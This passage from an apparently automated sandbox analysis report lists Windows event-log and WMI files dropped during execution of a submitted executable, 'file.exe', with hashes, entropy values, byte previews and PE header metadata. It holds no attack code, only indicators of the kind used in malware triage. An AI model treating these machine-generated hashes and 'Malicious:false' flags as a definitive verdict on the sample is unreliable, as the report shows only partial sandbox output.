                                      SSDEEP:384:uMO2MEMwGMOkiM/nhgM6NfMYMsMlaMbMKMA2MzMLMnjMV5MuTMiM11MNNMxMFiMJ:RYovcOFjlaDo5S+aTqOI63ka1bY
                                      MD5:C34199314B94EE0BEA57C0A66A9FA42E
                                      SHA1:4013ED30C24562AEEC1A870DA3F58FB5A443205D
                                      SHA-256:B4CCCEDD560C5ED6207AE1E1A030EC0622097227A35182244F3C4413D9D1075B
                                      SHA-512:7761C2D1473C5702CFD2D5E88DE954D9A2937154A25962476489348A43C53F2B183EA6B3EDA0E2967D17900B789F2C2CB057E6BB39E208073B49AE412323D321
                                      Malicious:false
                                      Preview:ElfChnk...............................................cD....................................................................W.+x........................................D...=...........................................................................................................................f...............?...........................m...................M...F.......................&........N......U...............................]...........................................................................**................."..............&.......................................................................F.....!...A.A..............".....U]..\J..x...|. ...H........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e..7*...\..C.....M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e./.O.p.e.r.a.t.i.o.n.a.l.....................I.......I.n.v.o.k.i.n.g. .l.i.c.e.n.s.e. .m.a.n.a.g.e.r. .b.e.c.a.u.s.e. .l.i.c.e.n.s.e./.l.e.a.s.e. .p.o.l.l.i.n.g. .t.i.m.e. .u.p.:. .P.F.N. .M.i.c.r
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):2.2445023289928083
                                      Encrypted:false
                                      SSDEEP:1536:lKlKkKPKhKNK8KZKMKtKAKZKxKtKPKcKlK2KOK8K4KMKpKwKoKEKLKVK5KxKmKGm:lKlKkKPKhKNK8KZKMKtKAKZKxKtKPKck
                                      MD5:4DBEDD8B1F83E96AA3D66C86D18BB596
                                      SHA1:1B8D188A835D73D62CF074ED54F1C28E0452244B
                                      SHA-256:237E5699A115E46545B09BCCDC55D18CBB1FBA3342613BD119E96148FCE13CFD
                                      SHA-512:C5AAB6701438FD6B752B625885D58BCB711E8FDA8D21DD08525468D479D240C9784F7C0DD85756F074E9FE171618AD2E975C0C4639D586620F1B49B83DF2ECDE
                                      Malicious:false
                                      Preview:ElfChnk.........8...............8............p..xr....b......................................................................n..................:...........................=...........................................................................................................................f...............?...........................m...................M...F.......................................................E?..........................................................................................**...............*.P.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.2584767503070673
                                      Encrypted:false
                                      SSDEEP:384:oheiViXiii3ieiAiAioiXiKiNi4iciHiyigihiFiqiCiwishi4i3iWi:o
                                      MD5:55950B9A9DBBF2E002DFA59B16AAC172
                                      SHA1:C52475DCE560E426DBB06CA26F84578DDD514C43
                                      SHA-256:DF41692DFCEABED3E540CCA07D24756E5AD2C3007D7392B140F3365F00B73624
                                      SHA-512:4490C3CDF7CE5CD7694A0B89CCE0D2D400953DE28E9245148CB602175B2E911421EFE150E953E5C88FC85EFFE6A23D6A45371565BAAD0B6FB28AD9CE97F68C67
                                      Malicious:false
                                      Preview:ElfChnk.w...............w....................<..8>..+.......................................................................%S..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F.......................................&...........................................................................................................**......w............{..........-.&.........-.{CST....M.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.236150334313226
                                      Encrypted:false
                                      SSDEEP:768:F5aoffaBahaVatatapala1aEa+aaa0acaaajaraHaYa8a+araDaNa2aFaranaXaY:/fP
                                      MD5:A9D1157400248F26B69127B24B3EBED7
                                      SHA1:4F005F4241A995441E5091C484BFE9DD13EF903A
                                      SHA-256:717529C5719FDF40B141C5A8E937133BD4010BA20C0721939F358D5E5889D51A
                                      SHA-512:E53998EEBE4670568A003BB94E3BC6E483CE2DA63CE87C7C83D492936FC1611D5CF15BFA94DF9392D7B7059B59A3DDC9471BE03204A85314F584573C4745BA2F
                                      Malicious:false
                                      Preview:ElfChnk.Y.......s.......Y.......s............R..XU..+x.B.....................................................................6w.................n...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&.......................................................G...................................................................**..h...Y.......F.Km.............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):2.186757899279565
                                      Encrypted:false
                                      SSDEEP:384:PhkXXXIZXoXfHXhXTXIXHXIXfXNXlCXTXvXKXQXiXnXLXJXvXdXGXoX3XdX2XcXp:PRQJ
                                      MD5:48AF79737C8F3EA5BA0EC3AE52D01335
                                      SHA1:146ED6348061A1232C32D210B1D75DB2C7F3AC7A
                                      SHA-256:9865C59195804F6FE335AAFF273DE8FE09A926F22F29E2E02FD4177221978E24
                                      SHA-512:72C19DF7C968B1099EA5954DA59FC2F2F37841DF746AD68A88DBD1883253983C59C7B6533F67685AFB2F8941899A90E6017D735E73EB3FC58061AF9AE3671101
                                      Malicious:false
                                      Preview:ElfChnk.........)...............)...........Pr...u..&g2q.....................................................................8v`................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................3.......................................&...........**..............`j4P.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.281469656005786
                                      Encrypted:false
                                      SSDEEP:768:xTtNTbDvefzf3w4/SDEnIQUkwlgz89IrArkG8R:Wy
                                      MD5:A8D0DD9A1601948BC9A8E224A693D6EB
                                      SHA1:4597EF2E5282F67513F5834B85C66DB551B1CA66
                                      SHA-256:E3899E786A7D40152F8C802DEC8733B9783DEDF65578C31E26767B0153CEA2EA
                                      SHA-512:CCE55F3A88DE0DBAA0EA18C8C244A111567176D319604CE0163A80D283E8ECDB2E7ECDD3D022C7056AD5FF11D6140193C51AC0A3980387E036B5605ECD3E2216
                                      Malicious:false
                                      Preview:ElfChnk.}.......~.......}.......~...................X{.A......................................................................,v................X...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&...................k...........................................1...........................................................**......}........................&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.9478010062992827
                                      Encrypted:false
                                      SSDEEP:384:GhIw2z72L2e2K2x2j28262j2F2g2q2J2X2U2y2n2l2w2:G4
                                      MD5:9A734815B7976006A98509CAD9A7C61C
                                      SHA1:691C1A3BE82F87526EC0207CD9502E20102EAE8A
                                      SHA-256:38BB165AE5D446E1C70A9717A333D09EFC072F5FE254EC48FDA427585232525E
                                      SHA-512:AC7FA4277BF7E3FBDBFA63E9FBE93FD2C6E9BE2C905E7D6799AD7650DEBD723E9BDB414A5AC839FDD5B420D0451ABB4E016D3C1AD510B5CB18996AE35BDF231E
                                      Malicious:false
                                      Preview:ElfChnk......................................)...*...y.........................................................................................Z...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&.......................................................................................................................3...**..............{oT!.3............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):4728
                                      Entropy (8bit):3.898603220819061
                                      Encrypted:false
                                      SSDEEP:48:MB5WW2HRtill/nV2JfJ4Y9yL9ANJfJjbjyCyVgwJfJjZtHnJfJf4eoo2HRtill/M:ljaV2RFyRyRxfiVfR1HRaei1RFIR1u
                                      MD5:822F33868E0CAC502E8683CDBE875543
                                      SHA1:1AC0BAF5FFAB65D715ED5E6D21679B91E3E674F4
                                      SHA-256:3F7204CAD2D578B05FBD73A1B976D6AC979145FCACD83908700D361CF12BC939
                                      SHA-512:1717547DC8C8177C96A8E2C44FB139F938A49A44D8A5C68E940859A8ED0E355055C3DBF7D35F948557D61520F3A908AF4FEC6E93F62A94E4D260EE53163530CB
                                      Malicious:false
                                      Preview:ElfChnk.z...............z...................@B..@D.....y.....................................................................;.......................(.......(...0.......0..=........................................3...)...................(...............................1..........i0..........]...f...C.......Q...?......................../..............(.......M...F...............f....................3..&......................................................../..................................6...............**..H...........7...............-.&...............................................................<.......T.....!................@7.......w.3.....04.................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l......6.......*...............v...P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.......w.m.i.p.r.v.s.e...e.x.e.......".%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.W.i
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.8087925092526325
                                      Encrypted:false
                                      SSDEEP:384:Fh9h1hvh+h/h8hBhHFhKJhFhxhShxdh6h0hhhThah+hXhFhjh8hdhehrchHhGhvF:F/eCu7jg
                                      MD5:AA17B591FB49AAE70E2FDA0A4E29A233
                                      SHA1:BEC6E44E22A3BA270A9CFB62C7E6EA7D17CB3C4C
                                      SHA-256:A2BCE7FFA058FC98D852E68182755E8F53B17AA13C832B06FD4687AF6025BB63
                                      SHA-512:BDA1B574C861BD7BC6CD6ED9DFA22165D090A08CAAA22D406D5365DE80207770B4C64B700156D4765DB3205E5BD9F05E7129B206AA04E608E3CD469E44F846AE
                                      Malicious:false
                                      Preview:ElfChnk.............................................dv.&.....................................................................C.;............................................=...........................................................................................................................f...............?...........................m...................M...F.......................f.......................................................................A.......................................&...........**..H...........:..P.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.8807169826709864
                                      Encrypted:false
                                      SSDEEP:384:1hsV80VUVAOV+8VPVRV8VuV4VCVlViVLVbVhV9V8VcVMVXUg7/TP5uc8WfJ5S0Gd:1/Mfg7/TP5ucrk0G9G9SAMLgM
                                      MD5:064E49AC92987291E981ADB98DCBA198
                                      SHA1:F61B1497809498EC96D19F83B286177E51A67885
                                      SHA-256:D347274F9AEB33C419AF04A170FE151DDEA3245DA52C4B838A1B5531FFB1EBC2
                                      SHA-512:E50E19A729CD6DAB2306FE36455675938098A3459C9006127CD9A7D29D548109083176B3E1694A6E855260AE7C89F0FF9EF60F44BBC420256F07903FF96AD44F
                                      Malicious:false
                                      Preview:ElfChnk..................................... #...$..T"......................................................................h..d................&...........................=...........................................................................................................................f...............?...........................m...................M...F.......................v...............................................................................................................&...........**..P...........~.nP.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.6633174586145385
                                      Encrypted:false
                                      SSDEEP:768:c2iNZ5Pu7HjHgU/PA4nzPv48vrAQ3noAYoFJrDf04rfIcbj04rfPHU0jLg40gvPP:R
                                      MD5:F39C76A8FC3F0F9C8113E55EFDE95043
                                      SHA1:4B0B10FAE8F4177EFD271851FCCA4DEB04D7206D
                                      SHA-256:92FF8AEA6304F3C76EBE3FE6ACC11AAA4BA785CDA108BF0DE77F5681E4BAB5EC
                                      SHA-512:CC9E8A6D9D3A49DFC0700289CD730998E8A7FC85FD173E95DEC63D1706EC9E1C0CB263A98479249AE1BC1791740241550E5901A5C458FED5C011C8F5D21DBCC3
                                      Malicious:false
                                      Preview:ElfChnk.........T...............T...................v..........................................................................................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F.......................v...............................................................................................................&...........**..@...........^..K.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 153, DIRTY
                                      Category:dropped
                                      Size (bytes):98688
                                      Entropy (8bit):3.0674599562280402
                                      Encrypted:false
                                      SSDEEP:768:AK2aSb+oY4pY+GhjYsx+Oa9rs4b6l3Ju6FWORIk5QHCMjAy/RBKkdD98XIA7K2aN:Xw
                                      MD5:6094AA9502825079EBF495AD9C3ACA97
                                      SHA1:7D11E3D59833170BF2480892F8906F8F039EA944
                                      SHA-256:4A38FBE94A3819BED941E6D51FDF6A5A26AE4D9039CC0D4FA850E674746D94A2
                                      SHA-512:AB1D6FBAA45183A07DD7363A2640519E028F40333EB9B1EA1B5E044ADBFF71DFD678899022E73E0BAF4C8650998D5DFD06B16904710B0909D3D68E5A66B9E5AF
                                      Malicious:false
                                      Preview:ElfFile........................................................................................................................[ElfChnk.j...............j...........................?......................................................................F..%................*...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................................................**..X...j.......x^v.{............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.242930031881895
                                      Encrypted:false
                                      SSDEEP:384:ph/BwBeabuSBwBTBwBlBwB1BwBPBwBXBwB+BwB6BwBWBwBUBwBSBwBUBwBeBwBFX:p7abRi+DFLVLZVN
                                      MD5:38C0FBCA2A34F3DD78D292B4A6E10C87
                                      SHA1:00626EF5F25CDEDC9AC2210234E62ADDA943517E
                                      SHA-256:F4A786DFDFDF53A60C89D3D9690C20F878B6383A61C7300815FC6FE7F850C0CD
                                      SHA-512:1FFBD35D282021B43BE7C44162AC91CE396384D3EBA8D63B85FAF138BC6CC91BDDBBF23A48A11BA5B382176BC7A3DDFE5DE8121ACC7BC996EC69BCBCCE49E5D5
                                      Malicious:false
                                      Preview:ElfChnk.........................................@....k......................................................................5{.............................................=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................'...........u...................................................**..`...........d.12.a............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.5509093890179249
                                      Encrypted:false
                                      SSDEEP:384:ihErUEyUEYUE9UEOUE5UEdTUEgUEdHUEtUEzUEUUElZUEkUEsUE8UElUEeUEoUE9:ie4Y3
                                      MD5:99897A421122019E38AFD3B6235F8A03
                                      SHA1:4FB8942FF9460B9EF08F46CCD18BFE8DA3069263
                                      SHA-256:7776E5B09F9125AFA0EFA6ED75A9707AC43B179A679F44E0F5A87FB4CBFA977F
                                      SHA-512:75A28ECFB67075F956C129D4DAC38BB0F8730B5BCDCD292B655803553DEA26E444A1192F652C653E9239D39DBFA46817F4476E5167DB2E5DF29076A1A3B20E90
                                      Malicious:false
                                      Preview:ElfChnk......................................E..hG..z..w......................................................................H.................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F.......................&...................................................................................1.......................................**................................&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.176100082151436
                                      Encrypted:false
                                      SSDEEP:384:NFRvLoyoAjoKuoPfFDG0ocMtnnEHKQYLoLo1ZoUwo8MtXAo8Mt7oIuEgo8Mtqfom:PBBl
                                      MD5:0DA901C6028EC1132501EAD2AD5A86B4
                                      SHA1:663B2CBA78442914FE420D58F7F229BBE6ED1AE0
                                      SHA-256:177E53BDBC05974D8755EF31E3F76F418C7C25FDCE7B44B8C54198411E9D7B9B
                                      SHA-512:62C4DB34D1D6C4019CB36A34DA44BED84FDABBA816B1EE2B3C286738558403DD7EB68B65F0540F36FCB67B0EFA0A0016FB8160542DAB9E881CC9D7F8C828FCE6
                                      Malicious:false
                                      Preview:ElfChnk.........................................8...P........................................................................w..........'...........s...h...............N...=...................................................N...............................................w.......B.......................;...................................i...........).......M...`...:...........................................................................................................................................&...**..8............+.............+7.&........+7.&.mQ..S...A.M.......A..A...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....j...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):2480
                                      Entropy (8bit):3.935016658895314
                                      Encrypted:false
                                      SSDEEP:48:M+2Lk/6jTUGSTUMUBaQKp5AlhPZlf0xKi+yFB58y78gCKuKh:KOmTU5TUMUBo6Vf0xXB58y7bCtW
                                      MD5:B6570B055FC21150FD2DE1312C34E5AA
                                      SHA1:9701E12B4F0EE8CA23D314C9FAC0307F66CAA9B9
                                      SHA-256:E065D511AC3921E5F0A6F6D436BE3131B7E024BB3C41C693655DD10C237BE870
                                      SHA-512:39014DE3E960E0D9ED0BFC1D15DFA892D315886268ACA328CDDCDA8E91AED6F9E21D0456A142CF518ABBE3EA3C8AD4D35349B684709F3865AD88754BC08652D4
                                      Malicious:false
                                      Preview:ElfChnk.....................................(........V......................................................................B_.K....................s...h...............?...=...................................................N...................................`...........w.......>.......................S...................................e...........).......M...A...:.......................................&.......................V...........................................,...................................**..............}.02..........`~..V.......`~... !X..)............A......M...s....j.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....G........A..............F=.......S.e.r.v.i.c.e. .C.o.n.t.r.o.l. .M.a.n.a.g.e.r.F......&.{.5.5.5.9.0.8.d.1.-.a.6.d.7.-.4.6.9.5.-.8.e.1.e.-.2.6.9.3.1.d.2.0.1.2.f.4.}..........`...E.v.e.n.t.S.o.u.r.c.e.N.a.m.e.......S.e.r.v.i.c.e. .C.o.n.t.r.o.l. .M.a.n.a.g.e.r..A...........................
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):27536
                                      Entropy (8bit):3.8130179832121898
                                      Encrypted:false
                                      SSDEEP:384:B9v49vS9vk9v7i9vR9ve9vJl9vJeqOdqOjqOJqOxBqOmqOOqOXqOc:L42cKjaRHRehPVbCKD4
                                      MD5:620193084B1A93183D75EF6E59204B8F
                                      SHA1:2FF0AB400831E6DF7DE1B29C52EED795F94B526D
                                      SHA-256:0CC5F4A2C676292D4E6C015E0DB5FB02DE625ED60C1C613C8C1F30D1B1CD8826
                                      SHA-512:A0C6F454141A897181A13DF1EF784BE5FADA264BF03498F019FAA12E512C2F764E749F8816D025C1F676192F850D2AE2AB2F71568DE2D0B0A5BF4151590A7D07
                                      Malicious:false
                                      Preview:ElfChnk......... ...............0...........(...0...%.n.....................................................................d...................S.......................{...=...................................................................................\...................................................................................s...................M.......c...........................................................................................&...........................................,.......**..`...!..........,..............&.....................................................................................!.....X..............,............!..............w.)C,...................R.e.g.i.s.t.r.y...S.t.a.r.t.e.d.....P.r.o.v.i.d.e.r.N.a.m.e.=.R.e.g.i.s.t.r.y.......N.e.w.P.r.o.v.i.d.e.r.S.t.a.t.e.=.S.t.a.r.t.e.d...........S.e.q.u.e.n.c.e.N.u.m.b.e.r.=.1...........H.o.s.t.N.a.m.e.=.C.o.n.s.o.l.e.H.o.s.t.......H.o.s.t.V.e.r.s.i.o.n.=.5...1...1.7.1.3.4...1.......H.o.s.t.I.d.=
                                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):3444
                                      Entropy (8bit):5.011954215267298
                                      Encrypted:false
                                      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                      MD5:B133A676D139032A27DE3D9619E70091
                                      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                      Malicious:false
                                      Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                                      File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                      Entropy (8bit):7.644002604978999
                                      TrID:
                                      • Win64 Executable (generic) (12005/4) 74.95%
                                      • Generic Win/DOS Executable (2004/3) 12.51%
                                      • DOS Executable Generic (2002/1) 12.50%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                      File name:file.exe
                                      File size:10264640
                                      MD5:eee7b971e0b76a0df56bdac2ac2fa343
                                      SHA1:c80f9d9de5d0dff115bbb7638554dade321d7c65
                                      SHA256:ecd60313ba990f1300b37db4064977e83f109fdf93a728cf434106c1b5b5a2d5
                                      SHA512:fffd216c820b3be324ac72a46c50683b42218deaf95c219670c3f44c091424e8ed5fc42b28f4aab46e8024a52cbe4ca989031ca3641536f3fae0a2b5f4f79e85
                                      SSDEEP:98304:AScdwkEObD07UX4SIf6Ky9UBMJs52fvaUhOAllh3uJZbZSvHzmmkvgDlWBixnxCa:Ald3Z0I2T0gAfCbZSvTlRXqbtci+
                                      TLSH:29A6D06D86866FE6EB880AF3491D47B6DEE21DF425E7E13180F8DF3325FA8800395195
                                      File Content Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......d...............&.....\...*.............@....................................$.....`... ............................
                                      Icon Hash:3271ccd4b2e07106
                                      Entrypoint:0x1400014b0
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x140000000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0x6482B51E [Fri Jun 9 05:14:06 2023 UTC]
                                      TLS Callbacks:0x40010560, 0x1, 0x40010530, 0x1
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f7505c167603909b7180406402fef19e
                                      Signature Valid:false
